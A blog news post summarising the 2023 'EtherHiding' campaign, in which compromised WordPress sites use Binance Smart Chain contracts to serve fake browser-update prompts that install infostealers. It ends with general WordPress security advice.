Binance Smart Chain Abused in ‘EtherHiding’ Malware Onslaught

• summy Morphe
• October 16, 2023
• News, Ethereum
• Binance, EtherHiding, Smart Chain
• 0 Comments

Cybercriminals exploit Binance Smart Chain to spread EtherHiding malware through compromised WordPress sites, presenting fake browser updates to victims.

Key Takeaways

• Cybercriminals leverage Binance’s Smart Chain contracts to host malicious code, initiating the EtherHiding malware campaign.
• Compromised WordPress sites trick users with fake browser update alerts, leading to malware like Amadey, Lumma, or RedLine.
• The decentralized, anonymous nature of blockchain makes this new method of attack difficult to detect and neutralize.
• Ensuring up-to-date systems, removing redundant admin users, and robust passwords are crucial for WordPress site security.

Cyber adversaries have reached a new pinnacle of deviousness by exploiting Binance’s Smart Chain (BSC) contracts to disseminate malicious code, a strategy experts at Guardio Labs are calling “the next evolution in bulletproof hosting.” Dubbed EtherHiding, this menacing campaign was unearthed approximately two months ago and is a worrying escalation in a series of attacks that abuse compromised WordPress sites.

Binance's Smart Chain Exploited in New 'EtherHiding' Malware Campaign https://t.co/Z4OzkUeQxQ

— The Cyber Security Hub™ (@TheCyberSecHub) October 16, 2023

Binance Smart Chain

Victims are lured into a trap by being presented with sham alerts urging a browser update before they continue navigating the websites. Unfortunately, compliance leads to the installation of dangerous information-stealing programs such as Amadey, Lumma, or RedLine. “After their initial Cloudflare Worker-hosted code was neutralized, they’ve adeptly shifted strategies, exploiting the blockchain’s inherent decentralized, anonymous, and transparent qualities,” reveal security analysts Nati Tal and Oleg Zaytsev.

The alarming agility of this campaign means it’s not only thriving but is also notoriously challenging to identify and dismantle. The method involves the corruption of WordPress sites through malicious plugins or known vulnerabilities in mainstream plugins, allowing attackers virtually unbridled control over the compromised platforms.

In this sophisticated sequence of assaults, malignant sites are loaded with camouflaged JavaScript, crafted to interact with the BNB Smart Chain through a specially designed smart contract linked to an attacker-dominated blockchain address. This process is engineered to trigger a cascade of scripts, ultimately culminating in deceptive browser update prompts.

If the victim falls for the ruse and engages with the update, they’re led into a quagmire where malware-laden executables are downloaded from reputable file-hosting services. The decentralized essence of the service hampers efforts to meddle with or halt the attack progression, leaving the malicious contract active and harmful.

Concluding Thoughts

The EtherHiding campaign underscores the double-edged sword of decentralized technologies. While blockchain’s immutability and transparency offer revolutionary applications, these very traits can be manipulated by cybercriminals to create nearly indestructible networks for malware deployment.

For entities using WordPress, this development is a stark reminder of the importance of rigorous cybersecurity hygiene. The dynamics of cybersecurity are ever-evolving, and the onus is on individual users and organizations to remain abreast of updates, diligently apply patches, and maintain a robust defensive posture. In the unending cat-and-mouse game with threat actors, staying informed and proactive is not just beneficial—it’s essential for survival in the digital realm.